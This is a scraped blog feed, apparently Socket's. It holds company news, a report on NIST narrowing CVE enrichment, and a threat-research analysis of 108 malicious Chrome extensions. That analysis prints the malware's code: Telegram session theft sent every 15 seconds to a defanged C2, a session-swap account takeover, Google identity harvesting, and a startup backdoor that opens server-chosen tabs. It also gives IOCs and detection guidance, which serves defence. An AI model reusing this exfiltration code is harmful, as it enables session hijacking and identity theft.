Socket has been named a 2026 Reppy Award recipient by RepVue in two categories: Small Companies and Venture Capital Backed Companies. RepVue is the leading platform for B2B sales reps to rate their own employers, with more than 225,000 users, and Reppys recognize top-rated sales organizations based on employee ratings across categories like Culture & Leadership, Compensation, and Product-Market Fit.
Socket earned a RepVue Score of 94.25, placing us in the top 5% of all companies on the platform. In Culture and Leadership, Socket ranked in the 98th percentile of software organizations (#34 of 3,091). In Product-Market Fit, Socket ranked #38 of 3,091.
The recognition reflects what our sales team has been building: a culture rooted in curiosity, collaboration, and technical depth. That culture shows up in how people grow here. We sat down with Alexandra Lister, who was recently promoted from SDR to Account Executive.
Q&A with Alexandra Lister, Account Executive
Alexandra Lister - Account Executive
Getting promoted from SDR to AE is a big milestone. What was your most powerful learning in the process?
Taking the time to understand how we're adding value for prospects and customers, asking better questions, and connecting what we do to the real problems they're dealing with.
What advice would you give someone applying to a sales role at Socket?
Be curious and ready to learn. Security is technical, so the people who succeed here are the ones who ask a lot of questions, take initiative, and aren't afraid to admit when they don't know something. Being coachable goes a long way.
What do you think makes Socket a great sales organization?
Everyone is collaborative. People share what's working, help each other think through deals, and there's a lot of openness around learning. That makes a huge difference when you're selling something technical, because you're never figuring it out alone.
What song is on repeat on your playlist right now?
"Ring My Bell" by Anita Ward. I've been in my disco era lately.
We're hiring.
Socket is hiring across the sales org, and we're growing fast. If you want to be part of a top-performing team securing the world's software supply chains, check out our open roles.
","summary":"Socket won two 2026 Reppy Awards from RepVue, ranking in the top 5% of all sales orgs. AE Alexandra Lister shares what it's like to grow a sales career here.","image":"https://cdn.sanity.io/images/cgdhsj6q/production/6f725e911538034f44bfdc15062ec3d24718cbe3-1536x1024.png?w=1000&q=95&fit=max&auto=format","banner_image":"https://cdn.sanity.io/images/cgdhsj6q/production/6f725e911538034f44bfdc15062ec3d24718cbe3-1536x1024.png?w=1000&q=95&fit=max&auto=format","date_published":"2026-04-17T22:51:18.893Z","author":{"name":"Sarah Gooding"},"tags":["Company News"]},{"id":"https://socket.dev/blog/nist-officially-stops-enriching-most-cves","url":"https://socket.dev/blog/nist-officially-stops-enriching-most-cves?utm_medium=feed","title":"NIST Officially Stops Enriching Most CVEs as Vulnerability Volume Skyrockets","content_html":"NIST is moving to a risk-based enrichment model for the National Vulnerability Database, formally abandoning its longstanding goal of analyzing every submitted CVE. Starting immediately, the NVD will only enrich vulnerabilities that appear in CISA's Known Exploited Vulnerabilities (KEV) catalog, software used by the federal government, or software designated as critical under Executive Order 14028. Everything else gets labeled "Not Scheduled."
The announcement came during VulnCon, where NVD leadership presented the changes before the official press release dropped. Within minutes, the security community was reacting.
NIST attributed the policy change directly to volume. "This change is driven by a surge in CVE submissions, which increased 263% between 2020 and 2025," the agency wrote in its announcement. "We don't expect this trend to let up anytime soon. Submissions during the first three months of 2026 are nearly one-third higher than the same period last year."
The agency was also explicit that its own output, while up sharply, still isn't keeping pace. "We are working faster than ever. We enriched nearly 42,000 CVEs in 2025 — 45% more than any prior year," NIST wrote. "But this increased productivity is not enough to keep up with growing submissions."
Vulnerability historian Brian Martin, who has tracked NVD's operational decline closely, commented on changes to the backlog, noting that the database quietly reshuffled its numbers ahead of the announcement.
"NVD just gave up on 29,000 more vulnerabilities," Martin wrote on LinkedIn, documenting how the agency moved vulnerabilities out of "Deferred" status and into "Not Scheduled" to reduce the visible backlog from over 33,000 to roughly 4,000. "Remember: 2024 VulnCon, Tanya Brewer said the backlog would be done by Sep 2024 too!"
Martin has been characteristically blunt about the resource problem. "The budget they have to do this work is disgusting and there is an incredible amount of inefficiency if they can't enrich with so little metadata," he wrote. "The VulnDB team enriched a lot more for every vulnerability for a fraction of the cost. Demand better."
NVD Dashboard - 4/17/2026
All pre-March 2026 backlogged CVEs will be moved to "Not Scheduled" in batches over the next two weeks, per NIST's announcement. The agency says users can email nvd@nist.gov to request enrichment of specific unscheduled CVEs, which will be reviewed "as resources allow."
Michelangelo Sidagni, CTO at NopSec, questioned the logic of tying enrichment so tightly to KEV. "In essence delegating the prioritization of vulnerabilities to CISA," he commented on LinkedIn. "What about all other vulnerabilities that are exploited in the wild but did not make it to the CISA KEV?"
It's a legitimate question. KEV is deliberately conservative. As of earlier this week, Martin clocked CISA's KEV at 1,559 vulnerabilities and VulnDB at over 7,000 with known exploitation, much of it longstanding cases that were always exploited but not previously cataloged. Either way, thousands of actively exploited vulnerabilities sit outside KEV, and under the new policy, outside enrichment too.
Enrichment is what makes a CVE entry usable. Without it, there's no CVSS severity score, and no Common Platform Enumeration (CPE) data linking the vulnerability to specific products. CPE is what allows security tools to programmatically match a CVE to software in an environment. Without it, the data can't be operationalized.
Immanuel Chavoya, founder of RiskHorizon AI, commented in the discussion on Martin's post that CPEs are a particular problem because "we're stuck with them" and NVD remains the authoritative source, not the vendors themselves.
NIST is also changing how it handles severity scoring going forward. The agency will no longer provide its own CVSS score when the CVE Numbering Authority (CNA) that submitted the CVE has already provided one. This shift to CNA-provided scores comes with its own complications.
Jerry Gamblin, principal engineer at Cisco, demonstrated at VulnCon this week that the NVD and GitHub already disagree on CVSS scores for nearly 1,500 CVEs. His Vuln Anarchy tool (renamed to Consensus Engine), was built through RogoLabs, an open-source lab dedicated to auditing global vulnerability infrastructure. It maps the deltas between the two sources, surfacing cases like CVE-2024-27306 in aiohttp, where GitHub's CNA score is 8.2 (High) and NVD's is 6.1 (Medium), a 2.1-point gap.
"That drift is the operational difference between an emergency sprint and a 'we'll get to it next month' ticket," Gamblin wrote.
The Consensus tool's Conflict Map makes the disagreement visible at a glance. Of 1,567 CVEs where both NVD and GitHub Advisory assigned a score, NVD came in higher 885 times and GitHub came in higher 682 times. The largest single gap was 6.9 points, on CVE-2025-48756. A cluster of cases shows drift of 4.0 points or more, which is the difference between a medium and a critical on the same vulnerability.
NIST's new policy says it will stop producing its own CVSS scores when a CNA has already assigned one. The implicit assumption is that CNA scores are good enough to stand alone. The Conflict Map shows they're often not aligned with what NVD independently concluded.
Martin tied the NVD situation directly to the recent Anthropic Glasswing / Mythos announcement, where AI-driven vulnerability discovery is being positioned to operate at unprecedented scale.
The promise is that Mythos can find vulnerabilities faster and at greater volume than human researchers. The concern, as Martin lays out in detail, is that the vulnerability disclosure pipeline has no capacity to absorb that volume.
"Finding the vulnerability is the very first step in the entire process," he wrote in a recent post on his blog. Coordinated disclosure, CVE assignment, NVD enrichment, and patch availability all have to follow, and every one of those stages is already overloaded.
Martin argues that the actual bottleneck isn't discovery. It's everything downstream. "Primarily the CVE and NVD bottlenecks, and they are continuing to be the bigger problem. When you look at all of this in the bigger picture, from discovery to disclosure to operationalizing the data, that is the vulnerability disclosure pipeline."
The NVD is formalizing its retreat from comprehensive enrichment precisely as a major new source of vulnerability discovery is being spun up. Whether Mythos-discovered CVEs get enriched will depend on how NIST interprets its new criteria, particularly what counts as "software used within the federal government." The announcement didn't define it.
Tom Alrich, who leads the OWASP SBOM Forum and Vulnerability Database Working Group projects, pointed to a January announcement from NIST signaling a shift of enrichment responsibility toward CNAs and commented on the contradiction: "After years of throwing out CVSS scores and CPE names created by CNAs, they now are 'shifting responsibility' to them!"
Ruben Bos, co-founder of Volerion, which uses AI to enrich CVEs automatically, said the announcement confirms what practitioners have been watching build for some time. "Public enrichment data was already delayed or missing," he said. "But this update just confirms that it's only getting worse. Absurd how manual analysis is still the main source of enrichment these days."
The database that security products have been built on for decades is formally narrowing its scope. Teams that haven't already built tooling around alternate sources are behind, and this announcement makes that gap official.
"The days of relying on a single, centralized source for all enriched data are over," Gamblin said. "We have to get better at decentralized data and independent analysis."
NIST framed the changes as a step toward long-term sustainability, citing plans to develop automated systems and workflow improvements. No timeline was provided, and that's the pattern we've seen following previously missed deadlines. Automation has been on NIST's public roadmap since at least 2024. At VulnCon 2025, the agency described pilot automation tools for Linux kernel enrichment and "research into machine learning and AI-backed methods." Timelines and specifics have consistently been missing.
Over the past two years, the backlog has been relabeled repeatedly. CVEs have been moved between "Awaiting Analysis," "Undergoing Analysis," "Deferred," and now "Not Scheduled," each shift reducing the visible backlog without reducing the actual work.
Meanwhile, the volume pressure on the pipeline is only going to grow. CVE assignment and NVD enrichment are already operating past their limits, and vendor patch response varies widely. Martin contends that the current pipeline is not prepared for the additional strain from an influx of AI-driven disclosures.
"If it even contributes to disclosures by a factor of 25%, it's already going to be just as harmful to organizations as helpful," he said.
"If it introduces a factor of 200% then you might as well begin Googling on how to start a goat sanctuary or learn basket weaving. Because you sure as hell won't want to live the InfoSec life any longer."
","summary":"NIST will stop enriching most CVEs under a new risk-based model, narrowing the NVD's scope as vulnerability submissions continue to surge.","image":"https://cdn.sanity.io/images/cgdhsj6q/production/499924f556e53fa8a7e24db18a0cc0c2060966e2-1024x1024.png?w=1000&q=95&fit=max&auto=format","banner_image":"https://cdn.sanity.io/images/cgdhsj6q/production/499924f556e53fa8a7e24db18a0cc0c2060966e2-1024x1024.png?w=1000&q=95&fit=max&auto=format","date_published":"2026-04-17T05:44:06.105Z","author":{"name":"Sarah Gooding"},"tags":["Security News"]},{"id":"https://socket.dev/blog/openai-cybersecurity-grant-program","url":"https://socket.dev/blog/openai-cybersecurity-grant-program?utm_medium=feed","title":"Socket Selected for OpenAI's Cybersecurity Grant Program","content_html":"OpenAI has named Socket as one of the initial recipients of its Cybersecurity Grant Program, a new initiative that commits $10 million in API credits to support organizations advancing cybersecurity defense.
The grant comes alongside access to more cyber-permissive frontier models through Trusted Access for Cyber, OpenAI's new identity-based framework for defensive acceleration.
Both programs select for trusted defenders with a proven track record in identifying and remediating vulnerabilities across open source software and critical infrastructure. Fellow recipients include Semgrep, Calif, and Trail of Bits.
Socket uses OpenAI's models inside our malicious package detection pipeline, which analyzes every package and version published to npm, PyPI, and other major registries in near real time. When a package goes live, our system evaluates its code, behavior, metadata, and publishing patterns to assess risk and flag anything that looks like a supply chain attack.
The advantage of frontier models in this pipeline is speed. When attackers ship a malicious package, the window to catch it before downstream projects pull it in is small, often measured in minutes. AI-assisted analysis lets us flag suspicious behavior at a scale human review alone cannot touch.
That pipeline is what allowed Socket to identify the malicious package used in the Axios compromise within six minutes of publication. Defensive AI enables that kind of turnaround, and it is how we protect our users and the open source ecosystem.
Supply chain attacks on open source have gotten faster and more automated over the past two years. High-volume package publishing, AI-assisted malware authoring, and credential theft campaigns targeting maintainers have compressed the time between compromise and impact.
Frontier models give defenders a way to close that gap. The asymmetry that favored attackers for most of the past decade is starting to even out, and the open source ecosystem is the direct beneficiary.
Socket has been investing in this approach since before these programs existed. The OpenAI partnership extends our ability to apply frontier capabilities across the pipeline, from malicious package detection to Certified Patches, which allow for rapid, surgical fixes to known vulnerabilities in open source dependencies.
The Cybersecurity Grant Program and Trusted Access for Cyber are part of a coalition of defenders working together on AI-assisted security. Enterprises supporting the broader effort include Bank of America, BlackRock, BNY, Citi, Cisco, CrowdStrike, Goldman Sachs, JPMorgan Chase, Morgan Stanley, NVIDIA, Oracle, and Zscaler.
Programs like these create a feedback loop between frontier model development and real-world defensive use cases. For Socket, that means continuing to improve detection and mitigation across the open source ecosystem, at greater speed, accuracy, and coverage. We will keep working with OpenAI and the broader defender community to push that boundary further.
","summary":"Socket is an initial recipient of OpenAI's Cybersecurity Grant Program, which commits $10M in API credits to defenders securing open source software. ","image":"https://cdn.sanity.io/images/cgdhsj6q/production/1954f9b570fe92fb9fd0963f4b5d0c2fc4cbbf8c-1536x1024.png?w=1000&q=95&fit=max&auto=format","banner_image":"https://cdn.sanity.io/images/cgdhsj6q/production/1954f9b570fe92fb9fd0963f4b5d0c2fc4cbbf8c-1536x1024.png?w=1000&q=95&fit=max&auto=format","date_published":"2026-04-16T19:37:29.823Z","author":{"name":"Sarah Gooding"},"tags":["Company News","Security News"]},{"id":"https://socket.dev/blog/feross-10-minutes-or-less-podcast-nobody-reads-the-code","url":"https://socket.dev/blog/feross-10-minutes-or-less-podcast-nobody-reads-the-code?utm_medium=feed","title":"Feross on the 10 Minutes or Less Podcast: Nobody Reads the Code","content_html":"In the past few weeks alone, we’ve seen a surge in supply chain attacks, increasingly sophisticated social engineering, and even nation-state actors targeting maintainers. What used to feel like a niche concern is now a daily reality for teams building with open source.
In this conversation, Socket CEO Feross Aboukhadijeh joins 10 Minutes or Less, a podcast by Ali Rohde, General Partner at Outset Capital, to break down what’s happening right now, from how the Axios backdoor attack unfolded to why traditional security approaches are struggling to keep up.
If you’ve been following these incidents on the Socket blog, this conversation dips into the broader context behind them and where things may be heading next.
Topics they cover:
Check out the full episode below:
Socket's Threat Research Team identified 108 malicious Chrome extensions operating as a coordinated campaign under a shared C2 infrastructure at cloudapi[.]stream. The extensions are published under five distinct publisher identities (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) and collectively account for approximately 20k Chrome Web Store installs. All 108 route stolen credentials, user identities, and browsing data to servers controlled by the same operator. The extensions remain live at the time of writing. We have submitted takedown requests to the Chrome Web Store security team and Google Safe Browsing.
The campaign spans several threat categories across 108 extensions:
Socket's AI scanner flagging obifanppcpchlehkjipahhphbcbjekfa as known malware with a behavioral summary of the session exfiltration and account takeover mechanism.
The 108 extensions are published across several product categories: Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancers, a text translation tool, and page utility extensions. Each targets a different type of user, but all share the same backend.
Users installing a Telegram sidebar extension see a functional chat interface. Users installing a slot game get a working game. The legitimate surface exists, but so does malicious code running in the background, connected to a C2 server that can steal identities, exfiltrate sessions, and open arbitrary URLs in the user's browser.
The most severe extension in the campaign is Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa). It steals the active Telegram Web session from the victim's browser and transmits it to tg[.]cloudapi[.]stream/save_session.php every 15 seconds.
How the theft works:
The extension injects content.js into https://web.telegram.org/* at document_start. On load, it immediately calls getSessionDataJson(), which serializes the page's entire localStorage and extracts the user_auth token used by Telegram Web to authenticate the session. It sends this to the background script via chrome.runtime.sendMessage, which relays it to the C2 server.
// content.js\n// Analyst note: Runs immediately on page load, before the user interacts with anything.\nlet getInfo = getSessionDataJson();\nif (getInfo.user_id !== null) {\n chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });\n}After the initial theft, a polling loop re-exfiltrates the session indefinitely:
// content.js\n// Analyst note: Sends the full session to the C2 every 15 seconds for the lifetime of the tab.\nsetInterval(async () => {\n let getInfo = getSessionDataJson();\n if (getInfo.user_id !== null) {\n await chrome.runtime.sendMessage({ action: "save_session", data: JSON.stringify(getInfo) });\n }\n}, 15000);The background script (background.js) then POSTs the data to the C2:
// background.js\nlet answr = await postJson('https://tg[.]cloudapi[.]stream/save_session.php', {\n uuid: result.uuid,\n session: xJsonData\n});Full account takeover:
The extension also handles an inbound message (set_session_changed) that performs the reverse operation: it clears the victim's localStorage, overwrites it with threat actor-supplied session data, and force-reloads Telegram. This allows the operator to swap any victim's browser into a different Telegram account without the victim's knowledge.
// content.js\n// Analyst note: The C2 can push any session data back to the extension.\n// This replaces the victim's active Telegram session with the threat actor's chosen session.\nif (message.action === 'set_session_changed') {\n let data = JSON.parse(message.data);\n localStorage.clear();\n clearAllCookies();\n for (var k in data) { localStorage.setItem(k, data[k]); }\n setTimeout(() => { window.location = "https://web.telegram.org/k/?r_=" + Math.random(); }, 500);\n}A 30-second heartbeat (sidepanel.js) polls tg[.]cloudapi[.]stream/count_sessions.php, giving the operator a live view of how many active sessions are available.
Staged Telegram stealer (Teleside):
A second extension, Web Client for Telegram - Teleside (mdcfennpfgkngnibjbpnpaafcjnhcjno, approximately 1,000 installs), has all the infrastructure for session theft: it strips Telegram's CSP, X-Frame-Options, and CORS headers via declarativeNetRequest, injects a content script at document_start on telegram.org, and sets web_accessible_resources: ["*"]. The active theft code is absent from v3.8.0. The extension is based on a trojanized SidebarGPT codebase. The loadInfo() backdoor present in the background script would allow the operator to activate or update the payload without pushing a Chrome Web Store update. Additionally, content-sidebar.html displays an active gambling overlay: a gameSession div set to display:block that serves a full-size banner from multiaccount[.]cloudapi[.]stream/game.html directly over the extension sidebar.
54 of the 108 malicious extensions steal the user's Google account identity the first time the user clicks the sign-in button. The code is identical across all 54:
chrome.identity.getAuthToken({ interactive: true }) acquires a Google OAuth2 Bearer token.https://www.googleapis.com/oauth2/v3/userinfo with that token.{email, name, picture, sub} to https://mines[.]cloudapi[.]stream/auth_google.// popup/auth.js (akebbllmckjphjiojeioooidhnddnplj, and 53 identical copies across the campaign)\n// (Russian comment): // Проверка на уже авторизованного пользователя\n// ("Check for already authenticated user")\n\nloginBtn.addEventListener("click", async () => {\n chrome.identity.getAuthToken({ interactive: true }, async (token) => {\n // Analyst note: token is a real Google OAuth2 Bearer token acquired via the\n // chrome.identity API. The user sees a standard Google sign-in prompt.\n const res = await fetch("https://www.googleapis.com/oauth2/v3/userinfo", {\n headers: { Authorization: `Bearer ${token}` }\n });\n const profile = await res.json();\n\n // Analyst note: The profile is sent to the threat actor's server, not to any\n // legitimate backend for the extension's stated functionality.\n const r = await fetch("https://mines[.]cloudapi[.]stream/auth_google", {\n method: "POST",\n headers: { "Content-Type": "application/json" },\n body: JSON.stringify({\n email: profile.email,\n name: profile.name,\n picture: profile.picture,\n sub: profile.sub // Persistent Google account identifier\n })\n });\n });\n});The OAuth token is used locally and never leaves the browser. What reaches the operator's server is only a permanent identity record: the victim's email, name, and profile picture.
The sub field is a stable, cross-service Google account identifier that does not change when a user changes their password or email address. Combined with the email and name, it gives the operator a persistent record of each victim's Google identity linked to their extension-assigned user_id on the cloudapi[.]stream backend. This does not give the operator access to the victim's Google account.
All 54 extensions use OAuth2 client IDs from only two Google Cloud projects: project 1096126762051 (31 client IDs) and project 170835003632 (25 client IDs). 56 unique client IDs across 54 extensions all trace to the same two project numbers, proving a single operator controls all publisher accounts despite five different publisher names on the Chrome Web Store.
45 extensions in the campaign include an identical function in their background script. It runs once on every browser startup:
// background.js (present in 45 extensions, confirmed by automated grep across extracted CRX files)\n// Analyst note: This runs automatically when Chrome starts and the service worker initializes.\n// The server can return any URL to be opened as a new tab in the victim's browser.\nasync function loadInfo() {\n const response = await fetch("https://mines[.]cloudapi[.]stream/user_info", {\n method: "POST",\n headers: { "Content-Type": "application/json" },\n body: JSON.stringify({ type: 'background', ext: chrome.runtime.id })\n });\n const result = await response.json();\n if (result && result.success && result.infoURL) {\n chrome.tabs.create({ url: result.infoURL });\n }\n}\nloadInfo();The operator's server receives the extension ID on every browser start. If the response includes infoURL, the extension silently opens that URL in a new tab. There is no restriction on what URL the server can return. This channel survives browser restarts and operates independently of whether the user ever opens the extension.
In two extensions (Page Locker and Page Auto Refresh), the loadInfo() function is stylistically inconsistent with the surrounding minified code: it uses clean async/await syntax while the rest of the file is minified. This indicates the function was injected after the extension's original code was written, consistent with an operator who acquired or repurposed existing extensions and added the backdoor.
The same user_info response that carries infoURL also drives direct DOM injection across 78 extensions. Every game and casino extension in the campaign includes a userpage.js file that takes two fields from the C2 response and writes them into the page using innerHTML with no sanitization:
// app/userpage.js (present across 78 extensions)\n // Analyst note: result.rating and result.protxt arrive from mines[.]cloudapi[.]stream/user_info.\n // No sanitization before DOM assignment — the C2 can push arbitrary HTML to any user's extension page.\n if (result.rating) {\n ratingPlayers.innerHTML = result.rating;\n }\n if (result.protxt) {\n proplansID.innerHTML = result.protxt;\n proplansID.classList.remove('h_');\n }result.rating populates the leaderboard panel. result.protxt populates the Pro Plans upsell section and un-hides it. The C2 server can substitute either field with arbitrary HTML, including script blocks, on any visit to the extension's UI. This is a distinct injection channel from loadInfo(): where the backdoor opens a new tab, server-controlled content injection rewrites the extension's own interface.
Five extensions use Chrome's declarativeNetRequest API to strip security headers from target sites before the page loads. The pattern is identical across all five: remove Content-Security-Policy, X-Frame-Options, and Content-Security-Policy-Report-Only; set Access-Control-Allow-Origin: *; and spoof the User-Agent, Origin, and Referer headers to impersonate the target site itself.
The five extensions and their targets:
Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa): targets web.telegram.org, spoofs User-Agent to iPhone SafariTeleside (mdcfennpfgkngnibjbpnpaafcjnhcjno): targets web.telegram.org, spoofs User-Agent to iPhone SafariYouSide (mmecpiobcdbjkaijljohghhpfgngpjmk): targets youtube.com, spoofs User-Agent to Chrome 140SideYou (bfoofgelpmalhcmedaaeogahlmbkopfd): targets youtube.com, spoofs User-Agent to Chrome 125Web Client for TikTok (cbfhnceafaenchbefokkngcbnejached): targets www.tiktok.com, spoofs User-Agent to Chrome 125All five were confirmed by reading rules_1.json directly from each extracted CRX file.
YouSide additionally injects a gambling overlay into its sidebar: a gameSession div set to display:block placing a banner ad from multiaccount[.]cloudapi[.]stream/game.html over the YouTube embed.
The TikTok extension adds a second declarativeNetRequest rule that unconditionally allows all WebSocket connections on all URLs, removing any network-level restriction on WebSocket traffic from TikTok pages. Its content script (sys-content.js) injects a link and image from multiaccount[.]cloudapi[.]stream/game.html into every TikTok page the user visits.
The ukraine.html file bundled with the TikTok extension serves as its privacy policy. It contains the contact email kiev3381917@gmail[.]com and carries the page title "Privacy Policy - Telegram Sidebar Extension," a copy-paste artifact from a different extension in the campaign confirming the same author wrote both.
Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) presents as a standard translation sidebar. When a user registers, the extension sends their email and full name to https://api[.]cloudapi[.]stream:8443/Register and receives an API key in return.
// main.js\n// Analyst note: User email and name are sent to the threat actor's server at registration.\n// The returned API key is stored in localStorage and attached to every translation request.\nconst url = 'https://api[.]cloudapi[.]stream:8443/Register';\n// ...\nlocalStorage.setItem('settings', JSON.stringify({\n email: $("#email").val(),\n name: $("#name").val(),\n key: result_.key\n}));Every translation request goes through https://api[.]cloudapi[.]stream:8443/Translation with the user's API key attached as an X-Key header. The operator's server receives the full text of everything the user submits for translation. This extension requests only the sidePanel permission and no host permissions, so it generates no permission warnings during installation.
All 108 malicious extensions share the same backend, hosted at 144[.]126[.]135[.]238 (Contabo GmbH VPS). The domain cloudapi[.]stream was registered on April 30, 2022 through Hosting Ukraine LLC. The server runs a Strapi CMS instance on port 1337 with a PostgreSQL database.
The confirmed subdomains and their roles:
tg[.]cloudapi[.]stream: Telegram session exfiltration, six endpoints including /save_session.php, /get_sessions.php, /delete_session.php, and /count_sessions.php (7 extensions)mines[.]cloudapi[.]stream: identity theft via /auth_google, C2 beacon via /user_info (returns infoURL for remote tab-open), user state persistence (used by 94 extensions)topup[.]cloudapi[.]stream: payment and monetization portal, confirming the MaaS model (linked from 78 extensions)cdn[.]cloudapi[.]stream: game asset hosting (79 extensions)multiaccount[.]cloudapi[.]stream: ad injection hub, injected directly into TikTok and other pages (29 extensions)gamewss[.]cloudapi[.]stream: WebSocket game server on port 8447 (6 extensions)wheel[.]cloudapi[.]stream: pre-positioned in host_permissions of 76 extensions but not used in any observed codeapi[.]cloudapi[.]stream:8443: translation API, user registration and content surveillance (1 extension)chat[.]cloudapi[.]stream: chat service (5 extensions)A secondary domain, top[.]rodeo, is listed in the host_permissions of 71 extensions and used as a game server backend. Two endpoint variants appear in source code: /server/remote.php and /server/remote3.php, both accepting uuid and extension_id parameters. The topup[.]cloudapi[.]stream payment portal and the per-user user_id system confirm this is operated as a Malware-as-a-Service platform. Victims are assigned accounts in the backend CRM, and stolen identities and sessions are accessible to whoever purchases access.
Chrome Web Store listings showing all three developer URLs used across the campaign: https://top[.]rodeo/ (Telegram Multi-account and Black Beard Slot Machine), https://webuk[.]tech/ (Page Locker), and https://interalt[.]net/ (InterAlt).
1. Direct CWS privacy declaration contradiction
Every extension's CWS listing contains a boilerplate declaration: "This developer declares that your data is not being used or transferred for purposes unrelated to the item's core functionality." The code sending user_id to mines[.]cloudapi[.]stream/user_info on every browser start, harvesting Google identity via auth_google, and opening operator-specified URLs has nothing to do with the stated function of a slot game or Telegram client. This is a verifiable lie in the listing itself, not an interpretation.
2. Google API Services User Data Policy - Limited Use
Extensions using chrome.identity.getAuthToken are bound by Google's Limited Use requirements. Profile data obtained via OAuth2 must only be used for the feature the user explicitly triggered. Routing it to a third-party C2 server with no disclosed relationship to the extension is a direct violation regardless of whether the token itself is exfiltrated.
3. CWS Ads Policy
Injecting a gambling overlay (multiaccount[.]cloudapi[.]stream/game.html) into the extension UI without any user consent or disclosure in the CWS listing violates the chrome web store policy requiring that any advertising be clearly disclosed. In Teleside and YouSide, the ad replaces the stated UI entirely.
The contact email kiev3381917@gmail[.]com appears in ukraine.html, a privacy policy HTML file bundled with the SideYou extension (bfoofgelpmalhcmedaaeogahlmbkopfd). The same file is reused across extensions: the copy found in Web Client for TikTok carries the title "Privacy Policy - Telegram Sidebar Extension" unchanged, directly linking the two extensions to the same author.
Three of the seven registered email addresses contain romanization variants of the same string “nadejdin” and “nadiezhdin”: nadejdinv@gmail[.]com (linked to 16 extensions), viktornadiezhdin@gmail[.]com (12 extensions), and slava.nadejdin.kiev@gmail[.]com (2 extensions).
Code comments in Russian appear in the authentication and session theft code across multiple extensions. In content.js , the comment reads "userId ne najden" (userId not found) and in auth.js , reads "Proverka na uzhe avtorizovannogo pol'zovatelya" (Check for already authenticated user).
Shodan scan of 144[.]126[.]135[.]238 confirming Contabo Inc. hosting, ISP Nubes LLC (AS40021), and nine open ports including a Strapi API server on 1337 and PostgreSQL on 5432.
Five publisher names on the Chrome Web Store (Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt) all resolve to the same two Google Cloud project numbers: 1096126762051 and 170835003632. This is the strongest single piece of evidence for unified ownership, as 56 unique OAuth2 client IDs across all 54 identity-stealing extensions share only these two project roots.
Users who installed any of the 54 identity-stealing extensions and clicked the sign-in button have had their Google email, full name, profile picture URL, and Google account identifier (sub) transmitted to mines[.]cloudapi[.]stream/auth_google. The sub value does not change when a user changes their password or email address.
Users who installed Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) and opened web.telegram.org while the extension was active have had their Telegram Web session exfiltrated at 15-second intervals. A threat actor with a stolen session can access all messages, contacts, and linked accounts without the user's password or two-factor authentication code.
Any browser with one of the 45 loadInfo() backdoor extensions installed responds to server-issued commands on every browser start, even if the user never opens the extension.
Across all 108 extensions, approximately 20k installs are on record. The extensions targeting Telegram account for roughly 3,035 of those installs.
topup[.]cloudapi[.]stream now serves a RODEO GAMES STUDIO about page describing a Chrome Extension monetization business with "well-thought-out monetization" and listing formatron.service@gmail[.]com as a support contact.
For users:
Telegram Multi-account (obifanppcpchlehkjipahhphbcbjekfa) while logged into Telegram Web, log out of all Telegram Web sessions from the Telegram mobile app under Settings > Devices > Terminate all other sessions.myaccount.google.com/permissions and revoke any unfamiliar entries.Text Translation (ogogpebnagniggbnkbpjioobomdbmdcj) and registered with your email, that email address and name are stored on the threat actor's server.For security teams:
cloudapi[.]stream and all its subdomains at the network level. The full list is in the IOC section below.top[.]rodeo.identity permission alongside oauth2 client IDs from Google Cloud project numbers 1096126762051 or 170835003632.loadInfo() pattern (POST to /user_info on service worker startup with the extension ID, open infoURL from response) is a detectable fingerprint. Scan extension bundles for the combination of user_info, infoURL, and chrome.tabs.create.declarativeNetRequest rules that remove content-security-policy from named target sites are not standard behavior and warrant review in any extension.Socket's Chrome extension protection analyzes extension bundles for hidden data flows, undisclosed credential exfiltration, and C2 backdoors, blocking malicious extensions before they reach user endpoints.
kiev3381917@gmail[.]comformatron.service@gmail[.]comnashprom.info@gmail[.]comviktornadiezhdin@gmail[.]comsupport@top[.]rodeoslava.nadejdin.kiev@gmail[.]comnadejdinv@gmail[.]comYana ProjectGameGenSideGamesRodeo GamesInterAlt1096126762051170835003632cloudapi[.]streamtg[.]cloudapi[.]streammines[.]cloudapi[.]streamtopup[.]cloudapi[.]streamcdn[.]cloudapi[.]streammultiaccount[.]cloudapi[.]streamwheel[.]cloudapi[.]streamgamewss[.]cloudapi[.]streamapi[.]cloudapi[.]streamchat[.]cloudapi[.]streamcrm[.]cloudapi[.]streamtop[.]rodeometal[.]cloudapi[.]stream144[.]126[.]135[.]238coin-miner[.]cloudapi[.]streamgoldminer[.]cloudapi[.]streamherculessportslegend[.]cloudapi[.]streamtg[.]cloudapi[.]stream/save_session.phptg[.]cloudapi[.]stream/count_sessions.phptg[.]cloudapi[.]stream/get_sessions.phptg[.]cloudapi[.]stream/get_session.phptg[.]cloudapi[.]stream/delete_session.phptg[.]cloudapi[.]stream/save_title.phpmines[.]cloudapi[.]stream/auth_googlemines[.]cloudapi[.]stream/user_infomines[.]cloudapi[.]stream/slot_test/api[.]cloudapi[.]stream:8443/Registerapi[.]cloudapi[.]stream:8443/Translationtop[.]rodeo/server/remote.phptop[.]rodeo/server/remote3.phptop[.]rodeo/notify.phpcloudapi[.]stream/install/cloudapi[.]stream/uninstall/obifanppcpchlehkjipahhphbcbjekfa - Telegram Multi-accountmdcfennpfgkngnibjbpnpaafcjnhcjno - Web Client for Telegram - Telesidemmecpiobcdbjkaijljohghhpfgngpjmk - YouSide - Youtube Sidebarbfoofgelpmalhcmedaaeogahlmbkopfd - Web Client for Youtube - SideYoucbfhnceafaenchbefokkngcbnejached - Web Client for TikTokogogpebnagniggbnkbpjioobomdbmdcj - Text Translationldmnhdllijbchflpbmnlgndfnlgmkgif - Page Lockerlnajjhohknhgemncbaomjjjpmpdigedg - Page Auto Refreshaecccajigpipkpioaidignbgbeekglkd - Web Client for Rugby Rush - SideGameakebbllmckjphjiojeioooidhnddnplj - Formula Rush Racing Gameakifdnfipbeoonhoeabdicnlcdhghmpn - Piggy Prizes - Slot Machineakkkopcadaalekbdgpdikhdablkgjagd - Slot Arabianalkfljfjkpiccfgbeocbbjjladigcleg - Frogtasticalllblhkgghelnejlggmmgjbkdabidie - Black Beard Slot Machineamkkjdjjgiiamenbopfpdmjcleecjjgg - Indian - Slot Machineamnaljnjmgajgajelnplfmidgjgbjfhe - Mahjong Deluxebbjdlbemjklojnbifkgameepcafflmem - Crazy 